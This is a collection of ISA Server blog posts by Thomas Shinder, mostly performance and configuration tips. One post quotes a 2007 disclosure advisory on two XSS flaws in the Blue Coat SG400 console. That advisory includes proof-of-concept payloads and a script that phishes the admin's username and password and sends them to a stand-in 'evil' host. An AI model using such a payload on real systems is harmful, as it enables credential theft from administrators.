Ever wonder if you’re running a trial or full version of the ISA Firewall? If so, then check out this quick tip from ISA Firewall MVP, Tarek Majdalani at http://elmajdal.net/isaserver/How_To_Identify_a_Tr...6.aspx
HTH,
Tom
Thomas W Shinder, M.D.
Site: http://www.isaserver.org/
Blog: http://blogs.isaserver.org/shinder/
Book: http://tinyurl.com/3xqb7
Email: tshinder@isaserver.org
MVP — Microsoft Firewalls (ISA)
In forward Web proxy scenarios, Web browsers are configured to use the ISA Firewall as their Web proxy. In Internet Explorer, for example, this is done by setting Use a proxy server or Automatically detect settings in Internet Options.
When Web clients are configured to use the ISA Firewall as their Web proxy device, they open connections directly to the ISA Firewall’s Web proxy listener, and send the proxy requests for locations on the Internet. (For example, Internet Explorer will open two connections to the Web proxy component when sending HTTP 1.1 requests.) When the ISA Firewall receives a request for a server, it opens a connection to this server, and reuses it for other requests coming from other clients to the same server. This leads to a star connection topology and leads to less resource utilization on the ISA Firewall and better performance.
The performance advantage of this scenario is that it allows for high reuse of connections, which minimizes the number of open connections as well as the connection rate.
In transparent proxy scenarios, client Web browsers are unaware of the ISA Firewall’s presence and are configured as SecureNAT clients. They sense that they are routed directly to servers on the Internet with no device between the SecureNAT client and the Internet Web server other than routers.
Specifically, SecureNAT clients access Internet servers directly by opening connections with the target Web sites. This leads to a considerable increase in connection rate, because after a user asks for a page on a new server, the Web browser shuts down its connections with the current Web server and opens new connections with the new Web server. This is typical of transparent proxy and has an negative effect on ISA Firewall performance. Typically, the client-side connection rate in transparent proxy is approximately three times higher than in forward proxy, which consumes approximately twice as many processor cycles per request.
Transparent proxy is a popular scenario because it is easy to deploy, especially for Internet service providers (ISPs) that have a heterogeneous client base. Unfortunately, there is a significant performance price to pay for this convenience.
In general, ISA Server requires twice the amount of CPU resources for transparent proxy as compared to forward proxy.
Adapted from http://www.microsoft.com/technet/isa/2006/perf_bp.mspx
HTH,
Tom
Thomas W Shinder, M.D.
Site: http://www.isaserver.org/
Blog: http://blogs.isaserver.org/shinder/
Book: http://tinyurl.com/3xqb7
Email: tshinder@isaserver.org
MVP — Microsoft Firewalls (ISA)
Installing ISA 2006 on Microsoft Virtual Server 2005 R2 is supported.
Because the Windows operating system that hosts Virtual Server cannot be protected by the ISA Firewall on a virtual server, the ISA Firewall in a Virtual Server environment should not be used in an edge firewall scenario, and this configuration is not supported. You can use this configuration securely in other scenarios, such as:
If you encounter high \Process\wspsrv\Virtual Bytes performance counter values (values of 1,800,000,000 (1.8 GB) indicate that there may be a problem), you may consider using the ISA Firewall on Virtual Server 2005 R2, as an alternative to buying another ISA server computer. Consider the following:
Measurements of a remote procedure call (RPC) over Secure HTTP (HTTPS) publishing scenario on a dual-core, dual-processor 2.2 GHz server with 8 GB of RAM showed the following:
Adapted from: http://www.microsoft.com/technet/isa/2006/perf_bp.mspx
As you can see, MS Virtual Server 2005 R2 can allow you to significantly scale out your ISA Firewalls to provide support for an additional tens of thousands of connections. Keep in mind that the ISA Firewall in a virtual environment cannot protect the host operating system, so you’ll need an ISA Firewall or ISA Firewall array in front of your virtual ISA Firewall environment to protect the host operating system hosting the guest ISA Firewalls.
HTH,
Tom
Thomas W Shinder, M.D.
Site: http://www.isaserver.org/
Blog: http://blogs.isaserver.org/shinder/
Book: http://tinyurl.com/3xqb7
Email: tshinder@isaserver.org
MVP — Microsoft Firewalls (ISA)
In most situations, a single computer has enough processing power to secure traffic going through standard Internet links. According to market research reports on Internet usage, most corporate Internet link bandwidths are between 2 and 20 Mbps. This indicates that an entry-level computer with a single or dual processor will suffice for most ISA Server deployments.
According to outbound firewall test results, ISA Server running on a single Pentium 4 2.4-GHz processor can provide a throughput of approximately 25 Mbps at 75 percent CPU utilization. This means that for each T1 Internet link (1.5 Mbps), the Microsoft Firewall service will utilize only 4.5 percent of the CPU resources. Dual Xeon 2.4-GHz processors can provide a throughput of approximately 45 Mbps (T3) at 75 percent utilization of the CPU, or 2.5 percent utilization of the CPU for every T1.
This is important information for those who are considering using the ISA Firewall as an internal firewall to segregate internal security zones. While 45Mbps is good for Internet connectivity, it represents a chokepoint for internal networks that run at 100Mbps and above. You might want to consider a quad core and do some testing if you have higher bandwidth requirements on your internal segments.
From: http://www.microsoft.com/technet/isa/2006/perf_bp.mspx
HTH,
Tom
Thomas W Shinder, M.D.
Site: http://www.isaserver.org/
Blog: http://blogs.isaserver.org/shinder/
Book: http://tinyurl.com/3xqb7
Email: tshinder@isaserver.org
MVP — Microsoft Firewalls (ISA)
Problem:
WMP sometimes displays auth prompts even though the logged-on user account is resolvable by ISA and has permissions to access the content through ISA policies.
Scenario:
ISA web proxy is configured for Windows Integrated authentication
ISA enforces authentication for HTTP traffic
WinMedia Player is configured to use a proxy (includes “autodiscover” or “browser”) for HTTP protocol
Discussion:
When WMP is acting as a web (CERN) proxy client, and the proxy requires Windows Integrated authentication, WMP will not auto-authenticate to the proxy if the proxy is specified as either FQDN or IP address. If the proxy is specified as NetBIOS (unqualified) name, WMP will auto-authenticate using the interactive account credentials. If the proxy requires Basic or Digest auth, an auth prompt is expected, regardless of how the proxy is specified. This behavior is the same if the proxy is obtained via an autoconfiguration (wpad) script.
By default, ISA 2004+ lists the proxies using their IP addresses in the wpad script. This default was chosen to prevent name resolution errors from impeding normal client-to-web proxy communications. While this works well enough for browsers, WMP “has issues” (yeh; we’ll go with that) when the proxy is specified using anything other than NetBIOS name.
Solution (two-part):
1. Disable the proxy settings for HTTP (pick one).
- Using WMP; Tools, Options, Network, Protocols, HTTP, set to “None”
- Using Regedit:
Key: HKCU\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP
Name: ProxyStyle
Type: DWORD
Value: 0
- Using GPO; under “User Configuration\Administrative Templates\Windows Components\Windows Media Player\Networking”, set the “Configure HTTP Proxy” option to “Disabled”
2. Install the FWC from MS downloads http://www.microsoft.com/downloads/details.aspx?Fa...43da89
After making this change, the FWC will handle all HTTP requests from WMP and ISA authentication will now be satisfied through the FWC control channel instead of the HTTP protocol mechanisms. This will stop the random auth prompts from WMP.
Enjoy,
JimmyJoeBob Alooba (A.K.A., Jim Harrison)
HTH,
Tom
“Microsoft estimates there are 1.2 million businesses of this size worldwide. Many of them have complex IT requirements. “Their infrastructures really rival those of enterprises,” says Russ Madlener, director of product planning for the Windows Server solutions group. Microsoft’s Small Business Server includes a number of different products installed together on one physical server, but medium-sized companies need more scale and better reliability than they can get with one server.
There will be both a Standard Edition and Premium Edition for the product. Both are based on Windows Server 2008. The Standard Edition will include Exchange Server 2007 for messaging, Forefront Security for Exchange, System Center Essentials for management and the ISA Firewall for firewalling and network security. This will be installed across three separate servers, one each for e-mail, management and security. The Premium Edition will add the next version of SQL Server.
Though companies could buy all of these products today, Windows Essential Business Server should cut costs and deployment headaches to a minimum, since the bundle will be cheaper than buying everything separately and easier to install since it’ll all be integrated. One license will handle all the products together, installation will automatically be done according to best practices and IT admins will have a single administration console from which to manage all of the products.”
For more information, check out:
Hey, no one ever claimed that Blue Coat was secure. Here you go:
From: <research_at_procheckup.com>
Date: 1 Nov 2007 17:20:04 -0000
(’binary’ encoding is not supported, stored as-is) PR07-29: Two XSS on Blue Coat ProxySG Management Console
Vulnerability found: 23 July 2007
Vendor informed: 20 August 2007
Vulnerability fixed: 29 October 2007
Advisory publicly released: 1 November 2007
Severity: Medium
Description:
Blue Coat SG400 is vulnerable to a couple of XSS holes.
Vulnerable server-side script / unfiltered parameter: ‘/Secure/Local/console/install_upload_action/crl_format’ / ‘name’
Vulnerable server-side script / unfiltered parameter: ‘/Secure/Local/console/install_upload_from_file.htm’ / ‘file’
Notes:
The admin user needs to be authenticated (HTTP basic authentication) for the injected JavaScript to run.
Successfully tested on:
Model: Blue Coat SG400
Software SGOS 4.2.1.6
Software Release ID: 25173
Proof of concept #1:
https://target:8082/Secure/Local/console/install_u...t?name=”<script>alert(”XSS”)</script>%00
Injected payload:
“<script>alert(”XSS”)</script>%00
Proof of concept #2:
https://target:8082/Secure/Local/console/install_u...m?file=<script>alert(”XSS”)</script><!–
Injected payload:
<script>alert(”XSS”)</script><!–
A neat payload to inject instead of a alert() box would be a phishing attack which would forward the username and password to a third-party site (the code could be inserted from a third-party site).
i.e.:
<script>
do {
a=prompt(”Blue Coat SG400: an error has occurred\nPlease enter your USERNAME”,”");
b=prompt(”Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD”,”");
}while(a==null || b==null || a==”" || b==”");
alert(”owned!:”+a+”/”+b);window.location=”http://evil/?u=”+a+”&p=”+b
</script><!–
Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG Management Console. Such code would run within the context of the target domain.
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: basic auth credentials stolen through a phishing attack as described in the Proof of Concept) to unauthorised third parties.
Fixed in:
4.2.6.1, 5.2.2.5
References:
http://www.procheckup.com/Vulnerability_2007.php
http://www.bluecoat.com/support/securityadvisories...bility
Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)
Received on Nov 01 2007
HTH,
Tom
Thomas W Shinder, M.D.
Site: http://www.isaserver.org/
Blog: http://blogs.isaserver.org/shinder/
Book: http://tinyurl.com/3xqb7
Email: tshinder@isaserver.org
MVP — Microsoft Firewalls (ISA)
You configure a computer that is running Microsoft Internet Security and Acceleration (ISA) Server 2006 to use pass-through authentication to access a published Web server. After you do this, all client requests to access the published Web site are blocked. Additionally, you may receive an error message that resembles the following:
Error Code: 403 Forbidden. ISA Server is configured to block HTTP requests that require authentication. (12250)
This issue may occur if the following conditions are true:
For the solution, check out the KB article here:
http://support.microsoft.com/kb/924374
HTH,
Tom
Thomas W Shinder, M.D.
Site: http://www.isaserver.org/
Blog: http://blogs.isaserver.org/shinder/
Book: http://tinyurl.com/3xqb7
Email: tshinder@isaserver.org
MVP — Microsoft Firewalls (ISA)
Cybercom (STO:CYBE) and Microsoft developed a secure login solution using e-authentication for Microsoft-based networks. Microsoft’s Internet Security and Acceleration (ISA) Server Firewall and Cybercom’s Trusted Authentication Server form the foundation for the solution, which is called Microsoft Authentication Broker.
“The Microsoft Authentication Broker solution is for enterprises, municipalities, and 24/7 public agencies,” says Tomas Rimming, Security division manager, Cybercom Sweden East, “organizations that need secure, cost-efficient ways to give e-authorized users access to services – users such as customers, inhabitants, and patients.”
Cybercom developed the solution for the Swedish market. It’s built on standard, Microsoft Windows Server 2003 components and an ISA 2006 firewall. The solution is adapted for e-authorization from digital certificate issuers such as BankID, Nordea, and TeliaSonera. The Microsoft Authentication Broker supports a mobile standard called BankID in the mobile, which will be launched in Sweden during 2008.
For more information, check out: http://press-releases.techwhack.com/13710/cybercom/
HTH,
Tom
Stefaan Pouseele posted a great blog entry this week on how to configure the Enterprise CA to use a specific port that can be used to make a request to an online Enterprise CA without having to create an “All Open” rule between the ISA Firewall and the CA. Stefaan points out that there are basically four steps:
For the details on how to carry out the config, check out Stefaan’s blog at:
http://blogs.isaserver.org/pouseele/2007/10/12/cer...tocol/
HTH,
Tom
Thomas W Shinder, M.D.
Site: http://www.isaserver.org/
Blog: http://blogs.isaserver.org/shinder/
Book: http://tinyurl.com/3xqb7
Email: tshinder@isaserver.org
MVP — Microsoft Firewalls (ISA)
Discuss your ISA Server issues with thousands of other ISA Server experts. Click here to join!
Order today Amazon.com
